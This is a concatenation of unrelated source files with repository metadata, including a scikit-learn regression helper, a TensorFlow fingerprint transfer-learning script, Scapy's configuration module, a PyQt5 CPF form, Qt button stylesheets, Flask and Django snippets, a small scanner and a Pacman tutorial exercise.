SelectFwe: Select features based on family-wise error rate.\n SelectPercentile: Select features based on percentile of the highest\n scores.\n '
(X, y) = check_X_y(X, y, ['csr', 'csc', 'coo'], dtype=np.float64)
n_samples = X.shape[0]
if center:
y = (y - np.mean(y))
if issparse(X):
X_means = X.mean(axis=0).getA1()
else:
X_means = X.mean(axis=0)
X_norms = np.sqrt((row_norms(X.T, squared=True) - (n_samples * (X_means ** 2))))
else:
X_norms = row_norms(X.T)
corr = safe_sparse_dot(y, X)
corr /= X_norms
corr /= np.linalg.norm(y)
degrees_of_freedom = (y.size - (2 if center else 1))
F = (((corr ** 2) / (1 - (corr ** 2))) * degrees_of_freedom)
pv = stats.f.sf(F, 1, degrees_of_freedom)
return (F, pv)
| [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
51e2a1aef863002583ef59c35412aaf0cd607aec | 465192ba0485123e7b87f0a2636fadd343fd4723 | /transfer.py | a07ce47e8ea029b4c361aa903b95183604c3696e | [] | no_license | sunset233/FringerprintCode | 05cc519eb6fc36abdaa607d07b778f4925c76767 | 88342bcd9b5bd3b7e9d93ff812567c2d6596a771 | refs/heads/master | 2022-06-28T14:48:25.248197 | 2020-05-09T14:43:55 | 2020-05-09T14:43:55 | 257,637,347 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,857 | py | import matplotlib
from matplotlib import pyplot as plt
matplotlib.rcParams['font.size'] = 18
matplotlib.rcParams['figure.titlesize'] = 18
matplotlib.rcParams['figure.figsize'] = [9, 7]
matplotlib.rcParams['font.family'] = ['KaiTi']
matplotlib.rcParams['axes.unicode_minus']=False
import os
import tensorflow as tf
import numpy as np
from tensorflow import keras
from tensorflow.keras import layers,optimizers,losses
from tensorflow.keras.callbacks import EarlyStopping
tf.random.set_seed(1234)
np.random.seed(1234)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
assert tf.__version__.startswith('2.')
from data_loading import load_nist,normalize
def preprocess(x,y):
# x: 图片的路径,y:图片的数字编码
x = tf.io.read_file(x)
x = tf.image.decode_jpeg(x, channels=3) # RGBA
x = tf.image.resize(x, [244, 244])
x = tf.image.random_flip_left_right(x)
x = tf.image.random_flip_up_down(x)
x = tf.image.random_crop(x, [224,224,3])
# x: [0,255]=> -1~1
x = tf.cast(x, dtype=tf.float32) / 255.
x = normalize(x)
y = tf.convert_to_tensor(y)
y = tf.one_hot(y, depth=10)
return x, y
batchsz = 32
# 创建训练集Datset对象
images, labels, table = load_nist('nist',mode='train')
db_train = tf.data.Dataset.from_tensor_slices((images, labels))
db_train = db_train.shuffle(1000).map(preprocess).batch(batchsz)
# 加载DenseNet网络模型,并去掉最后一层全连接层,最后一个池化层设置为max pooling
net = tf.keras.applications.DenseNet169(weights = 'imagenet', include_top=False, pooling='max')
# 设计为不参与优化,即MobileNet这部分参数固定不动
net.trainable = False
newnet = keras.Sequential([
net, # 去掉最后一层的DenseNet121
layers.Dense(1024, activation='relu'), # 追加全连接层
layers.BatchNormalization(), # 追加BN层
layers.Dropout(rate=0.5), # 追加Dropout层,防止过拟合
layers.Dense(10) # 根据指纹数据集,设置最后一层输出节点数为10, 用来表示指纹的类别数
])
newnet.build(input_shape=(4,224,224,3))
newnet.summary()
# 创建Early Stopping类,连续3次不下降则终止
early_stopping = EarlyStopping(
monitor='accuracy',
min_delta=0.0001,
patience=3
)
newnet.compile(optimizer=optimizers.Adam(lr=1e-3),
loss=losses.CategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
history = newnet.fit(db_train, epochs=100,
callbacks=[early_stopping])
newnet.save('model.h5')
history = history.history
print(history.keys())
print(history['accuracy'])
plt.figure()
returns = history['accuracy']
plt.plot(np.arange(len(returns)), returns, label='训练准确率')
plt.plot(np.arange(len(returns)), returns, 's')
plt.legend()
plt.xlabel('Epoch')
plt.ylabel('准确率')
plt.savefig('scratch.svg') | [
"786678906@qq.com"
] | 786678906@qq.com |
a4dfd68fde668dcfdee308b7d26cd714302bba38 | a4b185c5a7d5e386c3b8f738a3e79257e36fd015 | /scapy/config.py | 836de46831e7b8c5c4d2bf0d525aa704af0a77c1 | [] | no_license | sh0wrun/scapy | d640dccc22ebf04510fcf3406e88ffcce6da5f9b | 2adc641a37022b267275eb41330a0bbf9b683d21 | refs/heads/master | 2021-01-01T20:16:11.995257 | 2013-01-13T05:34:29 | 2013-01-13T05:34:29 | 12,031,321 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,032 | py | ## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <phil@secdev.org>
## This program is published under a GPLv2 license
"""
Implementation for of the configuration object.
"""
import os,time,socket,sys
from data import *
import base_classes
import themes
from error import log_scapy
############
## Config ##
############
class ConfClass(object):
def configure(self, cnf):
self.__dict__ = cnf.__dict__.copy()
def __repr__(self):
return str(self)
def __str__(self):
s=""
keys = self.__class__.__dict__.copy()
keys.update(self.__dict__)
keys = keys.keys()
keys.sort()
for i in keys:
if i[0] != "_":
r = repr(getattr(self, i))
r = " ".join(r.split())
wlen = 76-max(len(i),10)
if len(r) > wlen:
r = r[:wlen-3]+"..."
s += "%-10s = %s\n" % (i, r)
return s[:-1]
class Interceptor(object):
def __init__(self, name, default, hook, args=None, kargs=None):
self.name = name
self.intname = "_intercepted_%s" % name
self.default=default
self.hook = hook
self.args = args if args is not None else []
self.kargs = kargs if kargs is not None else {}
def __get__(self, obj, typ=None):
if not hasattr(obj, self.intname):
setattr(obj, self.intname, self.default)
return getattr(obj, self.intname)
def __set__(self, obj, val):
setattr(obj, self.intname, val)
self.hook(self.name, val, *self.args, **self.kargs)
class ProgPath(ConfClass):
pdfreader = "acroread"
psreader = "gv"
dot = "dot"
display = "display"
tcpdump = "tcpdump"
tcpreplay = "tcpreplay"
hexedit = "hexer"
wireshark = "wireshark"
class ConfigFieldList:
def __init__(self):
self.fields = set()
self.layers = set()
@staticmethod
def _is_field(f):
return hasattr(f, "owners")
def _recalc_layer_list(self):
self.layers = set([owner for f in self.fields for owner in f.owners])
def add(self, *flds):
self.fields |= set([f for f in flds if self._is_field(f)])
self._recalc_layer_list()
def remove(self, *flds):
self.fields -= set(flds)
self._recalc_layer_list()
def __contains__(self, elt):
if isinstance(elt, base_classes.Packet_metaclass):
return elt in self.layers
return elt in self.fields
def __repr__(self):
return "<%s [%s]>" % (self.__class__.__name__," ".join(str(x) for x in self.fields))
class Emphasize(ConfigFieldList):
pass
class Resolve(ConfigFieldList):
pass
class Num2Layer:
def __init__(self):
self.num2layer = {}
self.layer2num = {}
def register(self, num, layer):
self.register_num2layer(num, layer)
self.register_layer2num(num, layer)
def register_num2layer(self, num, layer):
self.num2layer[num] = layer
def register_layer2num(self, num, layer):
self.layer2num[layer] = num
def __getitem__(self, item):
if isinstance(item, base_classes.Packet_metaclass):
return self.layer2num[item]
return self.num2layer[item]
def __contains__(self, item):
if isinstance(item, base_classes.Packet_metaclass):
return item in self.layer2num
return item in self.num2layer
def get(self, item, default=None):
if item in self:
return self[item]
return default
def __repr__(self):
lst = []
for num,layer in self.num2layer.iteritems():
if layer in self.layer2num and self.layer2num[layer] == num:
dir = "<->"
else:
dir = " ->"
lst.append((num,"%#6x %s %-20s (%s)" % (num,dir,layer.__name__,layer.name)))
for layer,num in self.layer2num.iteritems():
if num not in self.num2layer or self.num2layer[num] != layer:
lst.append((num,"%#6x <- %-20s (%s)" % (num,layer.__name__,layer.name)))
lst.sort()
return "\n".join(y for x,y in lst)
class LayersList(list):
def __repr__(self):
s=[]
for l in self:
s.append("%-20s: %s" % (l.__name__,l.name))
return "\n".join(s)
def register(self, layer):
self.append(layer)
class CommandsList(list):
def __repr__(self):
s=[]
for l in sorted(self,key=lambda x:x.__name__):
if l.__doc__:
doc = l.__doc__.split("\n")[0]
else:
doc = "--"
s.append("%-20s: %s" % (l.__name__,doc))
return "\n".join(s)
def register(self, cmd):
self.append(cmd)
return cmd # return cmd so that method can be used as a decorator
def lsc():
print repr(conf.commands)
class CacheInstance(dict):
def __init__(self, name="noname", timeout=None):
self.timeout = timeout
self.name = name
self._timetable = {}
def __getitem__(self, item):
val = dict.__getitem__(self,item)
if self.timeout is not None:
t = self._timetable[item]
if time.time()-t > self.timeout:
raise KeyError(item)
return val
def get(self, item, default=None):
# overloading this method is needed to force the dict to go through
# the timetable check
try:
return self[item]
except KeyError:
return default
def __setitem__(self, item, v):
self._timetable[item] = time.time()
dict.__setitem__(self, item,v)
def update(self, other):
dict.update(self, other)
self._timetable.update(other._timetable)
def iteritems(self):
if self.timeout is None:
return dict.iteritems(self)
t0=time.time()
return ((k,v) for (k,v) in dict.iteritems(self) if t0-self._timetable[k] < self.timeout)
def iterkeys(self):
if self.timeout is None:
return dict.iterkeys(self)
t0=time.time()
return (k for k in dict.iterkeys(self) if t0-self._timetable[k] < self.timeout)
def __iter__(self):
return self.iterkeys()
def itervalues(self):
if self.timeout is None:
return dict.itervalues(self)
t0=time.time()
return (v for (k,v) in dict.iteritems(self) if t0-self._timetable[k] < self.timeout)
def items(self):
if self.timeout is None:
return dict.items(self)
t0=time.time()
return [(k,v) for (k,v) in dict.iteritems(self) if t0-self._timetable[k] < self.timeout]
def keys(self):
if self.timeout is None:
return dict.keys(self)
t0=time.time()
return [k for k in dict.iterkeys(self) if t0-self._timetable[k] < self.timeout]
def values(self):
if self.timeout is None:
return dict.values(self)
t0=time.time()
return [v for (k,v) in dict.iteritems(self) if t0-self._timetable[k] < self.timeout]
def __len__(self):
if self.timeout is None:
return dict.__len__(self)
return len(self.keys())
def summary(self):
return "%s: %i valid items. Timeout=%rs" % (self.name, len(self), self.timeout)
def __repr__(self):
s = []
if self:
mk = max(len(k) for k in self.iterkeys())
fmt = "%%-%is %%s" % (mk+1)
for item in self.iteritems():
s.append(fmt % item)
return "\n".join(s)
class NetCache:
def __init__(self):
self._caches_list = []
def add_cache(self, cache):
self._caches_list.append(cache)
setattr(self,cache.name,cache)
def new_cache(self, name, timeout=None):
c = CacheInstance(name=name, timeout=timeout)
self.add_cache(c)
def __delattr__(self, attr):
raise AttributeError("Cannot delete attributes")
def update(self, other):
for co in other._caches_list:
if hasattr(self, co.name):
getattr(self,co.name).update(co)
else:
self.add_cache(co.copy())
def flush(self):
for c in self._caches_list:
c.flush()
def __repr__(self):
return "\n".join(c.summary() for c in self._caches_list)
class LogLevel(object):
def __get__(self, obj, otype):
return obj._logLevel
def __set__(self,obj,val):
log_scapy.setLevel(val)
obj._logLevel = val
def _prompt_changer(attr,val):
prompt = conf.prompt
try:
ct = val
if isinstance(ct, AnsiColorTheme) and ct.prompt(""):
## ^A and ^B delimit invisible caracters for readline to count right.
## And we need ct.prompt() to do change something or else ^A and ^B will be
## displayed
prompt = "\001%s\002" % ct.prompt("\002"+prompt+"\001")
else:
prompt = ct.prompt(prompt)
except:
pass
sys.ps1 = prompt
class Conf(ConfClass):
"""This object contains the configuration of scapy.
session : filename where the session will be saved
interactive_shell : If set to "ipython", use IPython as shell. Default: Python
stealth : if 1, prevents any unwanted packet to go out (ARP, DNS, ...)
checkIPID: if 0, doesn't check that IPID matches between IP sent and ICMP IP citation received
if 1, checks that they either are equal or byte swapped equals (bug in some IP stacks)
if 2, strictly checks that they are equals
checkIPsrc: if 1, checks IP src in IP and ICMP IP citation match (bug in some NAT stacks)
check_TCPerror_seqack: if 1, also check that TCP seq and ack match the ones in ICMP citation
iff : selects the default output interface for srp() and sendp(). default:"eth0")
verb : level of verbosity, from 0 (almost mute) to 3 (verbose)
promisc : default mode for listening socket (to get answers if you spoof on a lan)
sniff_promisc : default mode for sniff()
filter : bpf filter added to every sniffing socket to exclude traffic from analysis
histfile : history file
padding : includes padding in desassembled packets
except_filter : BPF filter for packets to ignore
debug_match : when 1, store received packet that are not matched into debug.recv
route : holds the Scapy routing table and provides methods to manipulate it
warning_threshold : how much time between warnings from the same place
ASN1_default_codec: Codec used by default for ASN1 objects
mib : holds MIB direct access dictionnary
resolve : holds list of fields for which resolution should be done
noenum : holds list of enum fields for which conversion to string should NOT be done
AS_resolver: choose the AS resolver class to use
extensions_paths: path or list of paths where extensions are to be looked for
"""
version = "2.2.0-dev"
session = ""
interactive = False
interactive_shell = ""
stealth = "not implemented"
iface = None
readfunc = None
layers = LayersList()
commands = CommandsList()
logLevel = LogLevel()
checkIPID = 0
checkIPsrc = 1
checkIPaddr = 1
check_TCPerror_seqack = 0
verb = 2
prompt = ">>> "
promisc = 1
sniff_promisc = 1
raw_layer = None
raw_summary = False
default_l2 = None
l2types = Num2Layer()
l3types = Num2Layer()
L3socket = None
L2socket = None
L2listen = None
histfile = os.path.join(os.path.expanduser("~"), ".scapy_history")
padding = 1
except_filter = ""
debug_match = 0
wepkey = ""
route = None # Filed by route.py
route6 = None # Filed by route6.py
auto_fragment = 1
debug_dissector = 0
color_theme = Interceptor("color_theme", themes.NoTheme(), _prompt_changer)
warning_threshold = 5
prog = ProgPath()
resolve = Resolve()
noenum = Resolve()
emph = Emphasize()
use_pcap = False
use_dnet = False
ipv6_enabled = socket.has_ipv6
ethertypes = ETHER_TYPES
protocols = IP_PROTOS
services_tcp = TCP_SERVICES
services_udp = UDP_SERVICES
extensions_paths = "."
manufdb = MANUFDB
stats_classic_protocols = []
stats_dot11_protocols = []
temp_files = []
netcache = NetCache()
load_layers = ["l2", "inet", "dhcp", "dns", "dot11", "gprs", "hsrp", "inet6", "ir", "isakmp", "l2tp",
"mgcp", "mobileip", "netbios", "netflow", "ntp", "ppp", "radius", "rip", "rtp",
"sebek", "skinny", "smb", "snmp", "tftp", "x509", "bluetooth", "dhcp6", "llmnr", "sctp", "vrrp" ]
if not Conf.ipv6_enabled:
log_scapy.warning("IPv6 support disabled in Python. Cannot load scapy IPv6 layers.")
for m in ["inet6","dhcp6"]:
if m in Conf.load_layers:
Conf.load_layers.remove(m)
conf=Conf()
conf.logLevel=30 # 30=Warning
| [
"db@d1b.org"
] | db@d1b.org |
b41f6497620dac2bc9d6fd9ccbf1f73d47a95d85 | a14251a744f54752608d458addb4c4bccaac40d1 | /design.py | b1e12dd8f7d74796b5630555affc095c0bfdcb99 | [] | no_license | menardiluis/valida-cria-cpf | 488285520c80aae45b0cdda78ccf0a33dd8f62ea | 59086634030563e1ce002d83427483d21cb53180 | refs/heads/master | 2022-10-01T12:49:35.712640 | 2020-06-12T15:30:57 | 2020-06-12T15:30:57 | 271,826,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,086 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'design.ui'
#
# Created by: PyQt5 UI code generator 5.14.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_mainWindow(object):
def setupUi(self, mainWindow):
mainWindow.setObjectName("mainWindow")
mainWindow.resize(517, 149)
self.centralwidget = QtWidgets.QWidget(mainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(12)
font.setBold(False)
font.setWeight(50)
self.label_2.setFont(font)
self.label_2.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 0, 0, 1, 1)
self.inputValidaCpf = QtWidgets.QLineEdit(self.centralwidget)
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(12)
font.setBold(False)
font.setWeight(50)
self.inputValidaCpf.setFont(font)
self.inputValidaCpf.setObjectName("inputValidaCpf")
self.gridLayout.addWidget(self.inputValidaCpf, 0, 1, 1, 1)
self.btnValidaCpf = QtWidgets.QPushButton(self.centralwidget)
self.btnValidaCpf.setMinimumSize(QtCore.QSize(120, 0))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(12)
font.setBold(False)
font.setWeight(50)
self.btnValidaCpf.setFont(font)
self.btnValidaCpf.setObjectName("btnValidaCpf")
self.gridLayout.addWidget(self.btnValidaCpf, 0, 2, 1, 1)
self.label = QtWidgets.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(12)
font.setBold(False)
font.setWeight(50)
self.label.setFont(font)
self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 1, 1, 1, 1)
self.BtnGeraCpf = QtWidgets.QPushButton(self.centralwidget)
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(12)
font.setBold(False)
font.setWeight(50)
self.BtnGeraCpf.setFont(font)
self.BtnGeraCpf.setObjectName("BtnGeraCpf")
self.gridLayout.addWidget(self.BtnGeraCpf, 1, 2, 1, 1)
self.labelRetorno = QtWidgets.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(26)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.labelRetorno.setFont(font)
self.labelRetorno.setStyleSheet("color: green;\n"
"font: 26pt \"MS Reference Sans Serif\";")
self.labelRetorno.setInputMethodHints(QtCore.Qt.ImhNone)
self.labelRetorno.setText("")
self.labelRetorno.setAlignment(QtCore.Qt.AlignCenter)
self.labelRetorno.setObjectName("labelRetorno")
self.gridLayout.addWidget(self.labelRetorno, 2, 0, 1, 3)
mainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(mainWindow)
QtCore.QMetaObject.connectSlotsByName(mainWindow)
def retranslateUi(self, mainWindow):
_translate = QtCore.QCoreApplication.translate
mainWindow.setWindowTitle(_translate("mainWindow", "Gera ou Valida CPF"))
self.label_2.setText(_translate("mainWindow", "Validar CPF"))
self.btnValidaCpf.setText(_translate("mainWindow", "Validar"))
self.label.setText(_translate("mainWindow", "Gerar CPF"))
self.BtnGeraCpf.setText(_translate("mainWindow", "Gerar"))
| [
"luisfelipemenardi@gmail.com"
] | luisfelipemenardi@gmail.com |
e25792216f15f7cbbb8cbb007b836e573f7926a2 | ed8a6d4c4f7e2852bd9d2bd29da2030b0de6b78d | /InnovApplication/styleSheet.py | 535d62806b5a014b453c742b4a0a639b43c7fa58 | [] | no_license | CrippledCoder/Innovation-Control-Station | 9e36cda44740e8f36e6ecebac81cc4e1f43c818f | 02f5702ec8829b71d40879186fa407af6077b755 | refs/heads/master | 2020-10-01T09:41:12.353605 | 2020-01-20T06:42:31 | 2020-01-20T06:42:31 | 227,510,841 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,757 | py | buttonStyle = '''QPushButton {
box-shadow: 3px 4px 0px 0px #1564ad;
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #79bbff, stop:1 #378de5);
border-radius:10px;
border:1px solid #337bc4;
display:inline-block;
cursor:pointer;
color:#ffffff;
font-family:Arial;
font-size:40px;
font-weight:bold;
padding:12px 44px;
text-decoration:none;
text-shadow:0px 1px 0px #528ecc;
height: 80px;
}
QPushButton:hover {
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #378de5, stop:1 #79bbff);
background-color:#378de5;
}
QPushButton:active {
position:relative;
top:1px;
}
'''
adminButtonStyle = '''QPushButton {
box-shadow: 3px 4px 0px 0px #1564ad;
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #79bbff, stop:1 #378de5);
border-radius:10px;
border:1px solid #337bc4;
display:inline-block;
cursor:pointer;
color:#ffffff;
font-family:Arial;
font-size:30px;
font-weight:bold;
text-decoration:none;
text-shadow:0px 1px 0px #528ecc;
height: 80px;
word-wrap: normal;
width: 100px;
}
QPushButton:hover {
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #378de5, stop:1 #79bbff);
background-color:#378de5;
}
QPushButton:active {
position:relative;
top:1px;
}
'''
passButtonStyle = '''QPushButton {
box-shadow: 3px 4px 0px 0px #1564ad;
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #84ed6f, stop:1 #70cc5e);
border-radius:10px;
border:1px solid #337bc4;
display:inline-block;
cursor:pointer;
color:#ffffff;
font-family:Arial;
font-size:20px;
font-weight:bold;
text-decoration:none;
text-shadow:0px 1px 0px #528ecc;
height: 40px;
word-wrap: normal;
width: 100px;
color: black;
}
QPushButton:hover {
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #58a14a, stop:1 #84ed6f);
background-color:#70cc5e;
}
QPushButton:active {
position:relative;
top:1px;
}
'''
cancelButtonStyle = '''QPushButton {
box-shadow: 3px 4px 0px 0px #1564ad;
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #e88066, stop:1 #bd6a55);
border-radius:10px;
border:1px solid #337bc4;
display:inline-block;
cursor:pointer;
color:#ffffff;
font-family:Arial;
font-size:20px;
font-weight:bold;
text-decoration:none;
text-shadow:0px 1px 0px #528ecc;
height: 40px;
word-wrap: normal;
width: 100px;
color: black;
}
QPushButton:hover {
background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0.05 #995645, stop:1 #e88066);
background-color:#bd6a55;
}
QPushButton:active {
position:relative;
top:1px;
}
''' | [
"emontano07@gmail.com"
] | emontano07@gmail.com |
d7a325770fdcbe57186119e3f58637592af06199 | 2821a44dbb4ced3ed3c09bc34f2506a98460bdb7 | /myapp/api/controllers.py | 4f86a6f76da2e2938bc4f3d265c0a7d33d41cc21 | [] | no_license | frylion007/flask-template | 81159f742049031dc6a021f3d686ebc76bc5dd97 | a26e5f5a13c3f433b7cf359ea628b5f050c427f5 | refs/heads/master | 2020-04-16T02:59:14.265247 | 2018-03-20T09:34:38 | 2018-03-20T09:34:38 | 165,215,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | from flask import Blueprint
from views import TestApiView
api_bp = Blueprint("api", __name__, url_prefix="/api")
api_bp.add_url_rule("/<user_name>/", view_func=TestApiView, methods=["GET", "POST"])
| [
"nib@yoozoo.com"
] | nib@yoozoo.com |
b8d323d0decccbe9ef3af3f5071207f3446049e5 | bc1e9812575b2e75e63c518c707774d82a033ad7 | /compiler/scanner.py | 082c4728496231d10df020c9f0e89109cc356751 | [
"MIT"
] | permissive | julien-klaus/karel_the_robot | 98fff949acea48db90a5a748adc9daa0030dacfc | a9faa528330152e0a7862e9f2b6727abfb6d3c31 | refs/heads/master | 2022-11-09T12:11:22.513985 | 2020-06-16T09:15:55 | 2020-06-16T09:15:55 | 270,610,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,773 | py | import string
SYMBOLS = {
"m": "command", # move, no effect at barrier
"l": "command", # turn left 90 degree
"i": "command", # if <condition> (<program>) (<program>)
"u": "command", # until <condition> (<program>)
"b": "condition", # TRUE if next is barrier
"n": "condition", # TRUE current heading is north
"s": "condition", # TRUE current heading is south
"e": "condition", # TRUE current heading is east
"w": "condition", # TRUE current heading is west
"(": "lpar",
")": "rpar",
".": "dot",
"#": "hash",
"=": "equal"
}
NUMBER = list([str(i) for i in range(0, 10)])
ALPHA = list(string.ascii_uppercase)
class Scanner():
def __init__(self, input_string):
self.input_string = list(input_string)
self.index = 0
self.length = len(self.input_string)
# TODO: add row and column tracker
def _get_next_character(self):
if self.index < self.length:
cur_char = self.input_string[self.index]
self.index += 1
return cur_char
def has_next_character(self):
return self.index < self.length
def next(self):
# returns a description, value pair
cur_char = self._get_next_character()
while cur_char in [" "]:
cur_char = self._get_next_character()
if cur_char in NUMBER:
return ("number", cur_char)
elif cur_char in ALPHA:
return ("alpha", cur_char)
elif cur_char in SYMBOLS.keys():
return (SYMBOLS[cur_char], cur_char)
elif cur_char == "\n":
return ("newline", cur_char)
elif cur_char is None:
return (None, None)
else:
raise Exception(f"Character {cur_char} not known.") | [
"julien.klaus@uni-jena.de"
] | julien.klaus@uni-jena.de |
4cf33718ef8b8bd7a8a0b1a563669018b615f109 | 9d4f68edfe2b68689f27fbf8d4601b5e759c9b07 | /restful_dailyfresh/apps/user/migrations/0001_initial.py | fb8fea353230fb69877bbb8bf707e5f21693a8c5 | [] | no_license | javerthu/demo | 8cb9a7eadadde70c3117b2d598f47d4b977450d7 | 06335132e75c4df4ee2be535e255d9bc762e0087 | refs/heads/master | 2020-08-15T01:23:38.717143 | 2020-04-02T15:36:19 | 2020-04-02T15:36:19 | 215,259,562 | 2 | 0 | null | 2019-10-15T15:31:25 | 2019-10-15T09:29:38 | Python | UTF-8 | Python | false | false | 4,536 | py | # Generated by Django 2.2.6 on 2020-02-08 06:25
from django.conf import settings
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': '用户',
'verbose_name_plural': '用户',
'db_table': 'df_user',
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
('is_delete', models.BooleanField(default=False, verbose_name='删除标记')),
('receiver', models.CharField(max_length=20, verbose_name='收件人')),
('addr', models.CharField(max_length=256, verbose_name='收件地址')),
('zip_code', models.CharField(max_length=6, null=True, verbose_name='邮政编码')),
('phone', models.CharField(max_length=11, verbose_name='联系电话')),
('is_default', models.BooleanField(default=False, verbose_name='是否默认')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='所属用户')),
],
options={
'verbose_name': '地址',
'verbose_name_plural': '地址',
'db_table': 'df_address',
},
),
]
| [
"867216905@qq.com"
] | 867216905@qq.com |
a04bcc8f85cb55607cb8959f387f42c8434a5ffa | 1cb9c9ad628bd2d890abc82a4a9849fc390d9d8a | /python tutorial/buyLotsOfFruit.py | d4a50cf6e3e163e4b6fa10b73a6469a2233ebb15 | [] | no_license | Krantipaudyal/AI | 48463dac95e6081ce6e527bbd2d3ac168a5f045f | d3eb4e2ab2046f757fc1b83d1e4d6c5ba7dcead5 | refs/heads/main | 2023-04-26T18:53:17.927678 | 2021-05-24T17:48:49 | 2021-05-24T17:48:49 | 370,430,291 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,672 | py | # buyLotsOfFruit.py
# -----------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
To run this script, type
python buyLotsOfFruit.py
Once you have correctly implemented the buyLotsOfFruit function,
the script should produce the output:
Cost of [('apples', 2.0), ('pears', 3.0), ('limes', 4.0)] is 12.25
"""
from __future__ import print_function
fruitPrices = {'apples': 2.00, 'oranges': 1.50, 'pears': 1.75,
'limes': 0.75, 'strawberries': 1.00}
def buyLotsOfFruit(orderList):
"""
orderList: List of (fruit, numPounds) tuples
Returns cost of order
"""
totalCost = 0.0
for fruit, quantity in orderList:
if fruit not in fruitPrices:
print ("Not available!")
return None
else:
totalCost += fruitPrices[fruit] * quantity
return totalCost
# Main Method
if __name__ == '__main__':
"This code runs when you invoke the script from the command line"
orderList = [('apples', 2.0), ('pears', 3.0), ('limes', 4.0)]
print('Cost of', orderList, 'is', buyLotsOfFruit(orderList))
| [
"krantipaudyal@gmail.com"
